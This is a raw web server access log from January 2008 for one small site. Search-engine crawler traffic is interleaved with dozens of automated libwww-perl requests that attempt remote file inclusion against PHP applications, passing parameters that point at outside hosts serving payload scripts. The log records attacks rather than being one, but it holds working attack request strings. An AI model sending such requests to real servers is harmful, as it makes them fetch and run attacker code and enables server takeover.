69.93.236.82 - - [15/Jan/2008:09:15:39 -0800] "GET /logs/access_071210.log/securemembership/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.201 - - [15/Jan/2008:09:16:36 -0800] "GET /logs/access_080114.log HTTP/1.0" 200 566288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.71 - - [15/Jan/2008:09:17:00 -0800] "GET / HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:17:45 -0800] "GET /retreat1/webcam/retreat1_00133.jpg HTTP/1.0" 200 18032 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
66.181.240.100 - - [15/Jan/2008:09:17:46 -0800] "GET /logs/access_071210.log/securemembership/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:17:50 -0800] "GET /retreat1/webcam/retreat1_00168.jpg HTTP/1.0" 200 17788 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:18:12 -0800] "GET /retreat1/webcam/retreat1_00931.jpg HTTP/1.0" 200 38172 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:18:32 -0800] "GET /retreat1/webcam/retreat1_00094.jpg HTTP/1.0" 200 21365 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
69.93.236.82 - - [15/Jan/2008:09:18:51 -0800] "GET /logs/access_071216.log/securemembership/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:18:52 -0800] "GET /retreat1/webcam/retreat1_00524.jpg HTTP/1.0" 200 40714 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:19:27 -0800] "GET /retreat1/webcam/retreat1_00634.jpg HTTP/1.0" 200 31662 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
64.13.250.115 - - [15/Jan/2008:09:19:27 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.250.115 - - [15/Jan/2008:09:19:27 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.250.115 - - [15/Jan/2008:09:19:27 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:19:51 -0800] "GET /retreat1/webcam/retreat1_00835.jpg HTTP/1.0" 200 24461 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
66.181.240.100 - - [15/Jan/2008:09:20:08 -0800] "GET /logs/access_071216.log/securemembership/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:20:12 -0800] "GET /retreat1/webcam/retreat1_00979.jpg HTTP/1.0" 200 23457 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
194.30.169.80 - - [15/Jan/2008:09:20:27 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.30.169.80 - - [15/Jan/2008:09:20:27 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:20:34 -0800] "GET /retreat1/webcam/retreat1_00408.jpg HTTP/1.0" 200 17611 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
87.118.120.51 - - [15/Jan/2008:09:20:43 -0800] "GET /presto/ HTTP/1.0" 200 510 "http://www.sviolett.com" "Mozilla/4.8 [en] (X11; U; Linux 2.4.22-30mdk-i686-up-4GB i686; Nav)" "www.dmulk.com"
87.118.120.51 - - [15/Jan/2008:09:20:43 -0800] "GET /presto/ HTTP/1.0" 200 510 "http://www.sviolett.com" "Mozilla/4.8 [en] (X11; U; Linux 2.4.22-30mdk-i686-up-4GB i686; Nav)" "www.dmulk.com"
87.118.120.51 - - [15/Jan/2008:09:20:44 -0800] "GET /presto/ HTTP/1.0" 200 510 "http://www.sviolett.com" "Mozilla/4.8 [en] (X11; U; Linux 2.4.22-30mdk-i686-up-4GB i686; Nav)" "www.dmulk.com"
87.118.120.51 - - [15/Jan/2008:09:20:44 -0800] "GET /presto/ HTTP/1.0" 200 510 "http://www.sviolett.com" "Mozilla/4.8 [en] (X11; U; Linux 2.4.22-30mdk-i686-up-4GB i686; Nav)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:20:57 -0800] "GET /retreat1/webcam/retreat1_00783.jpg HTTP/1.0" 200 34611 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:21:27 -0800] "GET /retreat1/webcam/retreat1_00503.jpg HTTP/1.0" 200 42785 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:21:46 -0800] "GET /retreat1/webcam/retreat1_00872.jpg HTTP/1.0" 200 15274 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:22:10 -0800] "GET /retreat1/webcam/retreat1_00260.jpg HTTP/1.0" 200 20524 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:22:34 -0800] "GET /retreat1/webcam/retreat1_00208.jpg HTTP/1.0" 200 45009 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
211.21.95.220 - - [15/Jan/2008:09:22:51 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:22:56 -0800] "GET /retreat1/webcam/retreat1_00251.jpg HTTP/1.0" 200 41356 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
211.21.95.220 - - [15/Jan/2008:09:23:16 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:23:17 -0800] "GET /retreat1/webcam/retreat1_00079.jpg HTTP/1.0" 200 22486 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:23:37 -0800] "GET /retreat1/webcam/retreat1_00710.jpg HTTP/1.0" 200 15521 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:23:58 -0800] "GET /retreat1/webcam/retreat1_00169.jpg HTTP/1.0" 200 17674 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
204.15.252.72 - - [15/Jan/2008:09:24:31 -0800] "GET /logs/access_071229.log//index.php?menu=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.15.252.72 - - [15/Jan/2008:09:24:31 -0800] "GET //index.php?menu=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.15.252.72 - - [15/Jan/2008:09:24:31 -0800] "GET /logs//index.php?menu=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.119.18 - - [15/Jan/2008:09:25:04 -0800] "GET //?step=1&vwar_root=http://www.defendamosmaitencillo.cl/components/config.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.119.18 - - [15/Jan/2008:09:25:06 -0800] "GET /logs//?step=1&vwar_root=http://www.defendamosmaitencillo.cl/components/config.txt? HTTP/1.1" 200 30258 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.119.18 - - [15/Jan/2008:09:25:09 -0800] "GET /logs/access_071229.log//?step=1&vwar_root=http://www.defendamosmaitencillo.cl/components/config.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.110.136 - - [15/Jan/2008:09:27:29 -0800] "GET /logs/access_071218.log/classes/adodbt/sql.php?classes_dir=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.110.136 - - [15/Jan/2008:09:27:29 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.110.136 - - [15/Jan/2008:09:27:30 -0800] "GET /logs/classes/adodbt/sql.php?classes_dir=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.235.180.18 - - [15/Jan/2008:09:27:55 -0800] "GET /logs/access_071218.log/classes/adodbt/sql.php?classes_dir=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.235.180.18 - - [15/Jan/2008:09:27:56 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.235.180.18 - - [15/Jan/2008:09:27:56 -0800] "GET /logs/classes/adodbt/sql.php?classes_dir=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:28:19 -0800] "GET /retreat1/webcam/retreat1_00329.jpg HTTP/1.0" 200 17632 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
195.62.12.248 - - [15/Jan/2008:09:28:22 -0800] "GET /logs/access_071216.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.12.248 - - [15/Jan/2008:09:28:22 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.12.248 - - [15/Jan/2008:09:28:23 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:28:24 -0800] "GET /retreat1/webcam/retreat1_00645.jpg HTTP/1.0" 200 42650 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:28:44 -0800] "GET /retreat1/webcam/retreat1_00194.jpg HTTP/1.0" 200 22491 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
192.220.109.46 - - [15/Jan/2008:09:28:54 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://mtin.info/tiny_includes/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:29:05 -0800] "GET /retreat1/webcam/retreat1_00317.jpg HTTP/1.0" 200 17480 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
64.13.250.115 - - [15/Jan/2008:09:29:06 -0800] "GET /logs/access_071205.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:29:26 -0800] "GET /retreat1/webcam/retreat1_00275.jpg HTTP/1.0" 200 17042 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:29:46 -0800] "GET /retreat1/webcam/retreat1_00216.jpg HTTP/1.0" 200 52231 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
85.17.110.136 - - [15/Jan/2008:09:30:52 -0800] "GET /logs/access_071219.log/classes/adodbt/sql.php?classes_dir=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
192.220.109.46 - - [15/Jan/2008:09:31:25 -0800] "GET /forums/includes/kb_constants.php?module_root_path=http://mtin.info/tiny_includes/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.235.180.18 - - [15/Jan/2008:09:31:34 -0800] "GET /logs/access_071219.log/classes/adodbt/sql.php?classes_dir=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.17.110.136 - - [15/Jan/2008:09:31:36 -0800] "GET /logs/access_071225.log/forums/includes/kb_constants.php?module_root_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.110.136 - - [15/Jan/2008:09:31:37 -0800] "GET /forums/includes/kb_constants.php?module_root_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.110.136 - - [15/Jan/2008:09:31:37 -0800] "GET /logs/forums/includes/kb_constants.php?module_root_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
192.220.109.46 - - [15/Jan/2008:09:31:46 -0800] "GET /forum/includes/kb_constants.php?module_root_path=http://mtin.info/tiny_includes/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
192.220.109.46 - - [15/Jan/2008:09:32:29 -0800] "GET /includes/kb_constants.php?module_root_path=http://mtin.info/tiny_includes/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.235.180.18 - - [15/Jan/2008:09:33:21 -0800] "GET /logs/access_071225.log/forums/includes/kb_constants.php?module_root_path=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.235.180.18 - - [15/Jan/2008:09:33:21 -0800] "GET /forums/includes/kb_constants.php?module_root_path=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.235.180.18 - - [15/Jan/2008:09:33:21 -0800] "GET /logs/forums/includes/kb_constants.php?module_root_path=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.17.110.136 - - [15/Jan/2008:09:33:23 -0800] "GET /logs/access_071225.log/includes/kb_constants.php?module_root_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.110.136 - - [15/Jan/2008:09:33:24 -0800] "GET /includes/kb_constants.php?module_root_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.110.136 - - [15/Jan/2008:09:33:24 -0800] "GET /logs/includes/kb_constants.php?module_root_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.15.252.72 - - [15/Jan/2008:09:34:04 -0800] "GET //index.php?menu=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.235.180.18 - - [15/Jan/2008:09:34:14 -0800] "GET /logs/access_071225.log/forum/includes/kb_constants.php?module_root_path=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.235.180.18 - - [15/Jan/2008:09:34:14 -0800] "GET /forum/includes/kb_constants.php?module_root_path=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.235.180.18 - - [15/Jan/2008:09:34:14 -0800] "GET /logs/forum/includes/kb_constants.php?module_root_path=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:34:56 -0800] "GET /megumi/Necklace/13_Blue_Choker_18.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
66.235.180.18 - - [15/Jan/2008:09:36:53 -0800] "GET /logs/access_071225.log/includes/kb_constants.php?module_root_path=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.235.180.18 - - [15/Jan/2008:09:36:53 -0800] "GET /includes/kb_constants.php?module_root_path=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.235.180.18 - - [15/Jan/2008:09:36:53 -0800] "GET /logs/includes/kb_constants.php?module_root_path=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.110.156.59 - - [15/Jan/2008:09:39:01 -0800] "GET //index.php?menu=http://geocities.com/carneline0817/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.30.169.80 - - [15/Jan/2008:09:39:26 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.30.169.80 - - [15/Jan/2008:09:39:29 -0800] "GET /logs/access_071216.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.203 - - [15/Jan/2008:09:40:56 -0800] "GET /mobileoffice/?S=D HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.17.110.136 - - [15/Jan/2008:09:42:39 -0800] "GET /logs/access_071225.log//modules/TotalCalendar/about.php?inc_dir=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.110.136 - - [15/Jan/2008:09:42:40 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.110.136 - - [15/Jan/2008:09:42:40 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.92.82 - - [15/Jan/2008:09:42:40 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.92.82 - - [15/Jan/2008:09:42:41 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.92.82 - - [15/Jan/2008:09:42:41 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.66.208.56 - - [15/Jan/2008:09:42:46 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.208.56 - - [15/Jan/2008:09:42:47 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.214.54 - - [15/Jan/2008:09:43:08 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.214.54 - - [15/Jan/2008:09:43:09 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.238.195.13 - - [15/Jan/2008:09:43:14 -0800] "GET /logs/access_071228.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.238.195.13 - - [15/Jan/2008:09:43:15 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.238.195.13 - - [15/Jan/2008:09:43:15 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.242.208.120 - - [15/Jan/2008:09:43:24 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [15/Jan/2008:09:43:24 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.170.162 - - [15/Jan/2008:09:44:08 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.238.195.13 - - [15/Jan/2008:09:44:24 -0800] "GET /logs/access_071225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.13.195.202 - - [15/Jan/2008:09:44:33 -0800] "GET /logs/Encoder.php?base_dir=http://mysunsethouse-lombok.com/images/.../.../ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.13.195.202 - - [15/Jan/2008:09:44:33 -0800] "GET /Encoder.php?base_dir=http://mysunsethouse-lombok.com/images/.../.../ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [15/Jan/2008:09:44:36 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [15/Jan/2008:09:44:36 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.165.93 - - [15/Jan/2008:09:44:56 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.165.93 - - [15/Jan/2008:09:44:56 -0800] "GET //tools/send_reminders.php?includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.165.93 - - [15/Jan/2008:09:44:57 -0800] "GET /logs//tools/send_reminders.php?includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.140.234.80 - - [15/Jan/2008:09:45:03 -0800] "GET /logs/access_071216.log/sohoadmin/program/wizard/includes/login.php?_SESSION[docroot_path]=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.140.234.80 - - [15/Jan/2008:09:45:03 -0800] "GET /sohoadmin/program/wizard/includes/login.php?_SESSION[docroot_path]=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.140.234.80 - - [15/Jan/2008:09:45:04 -0800] "GET /logs/sohoadmin/program/wizard/includes/login.php?_SESSION[docroot_path]=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.225.219.10 - - [15/Jan/2008:09:46:14 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [15/Jan/2008:09:46:14 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [15/Jan/2008:09:46:14 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.13.195.202 - - [15/Jan/2008:09:46:19 -0800] "GET /logs/access.log/Encoder.php?base_dir=http://mysunsethouse-lombok.com/images/.../.../ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.13.195.202 - - [15/Jan/2008:09:46:19 -0800] "GET /logs/access_071219.log/Encoder.php?base_dir=http://mysunsethouse-lombok.com/images/.../.../ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
